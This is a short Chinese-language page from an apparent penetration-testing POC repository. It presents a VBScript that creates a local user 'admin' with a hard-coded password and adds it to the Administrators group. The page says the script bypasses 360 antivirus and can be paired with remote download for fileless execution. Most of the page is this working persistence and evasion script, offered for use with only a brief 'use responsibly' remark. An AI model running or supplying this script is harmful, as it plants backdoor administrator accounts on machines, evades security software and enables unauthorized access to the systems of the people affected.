Penetration_Testing_POC/使用vbs脚本添加管理员用户.md at be51a4c917f27112338a9c963e262ce411cd56c4

admin/Penetration_Testing_POC

Fork 0

mirror of https://github.com/Mr-xn/Penetration_Testing_POC.git synced 2025-07-09 16:05:40 +00:00

Mrxn 6882ea1696 add 三种绕过杀软添加管理员用户的工具和方法

2020-08-30 13:27:40 +08:00

716 B

Raw Blame History

正常执行命令添加用户会被360拦截如图：

使用vbs添加用户绕过360，成功添加:

项目tools目录也有添加add_user.vbs脚本，可以配合远程下载执行无文件落地执行。

源码如下:


set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","admin")
od.SetPassword "123456"
od.SetInfo
Set of=GetObject(os&"/admin",user)
oe.add os&"/admin"

注意密码复杂性，我项目里面的脚本密码是Love@123456

⚠️请合理使用，资源来自：https://mp.weixin.qq.com/s/yWTA8Q2GPwOMQBHph5srJQ

716 B Raw Blame History Unescape Escape

716 B

Raw Blame History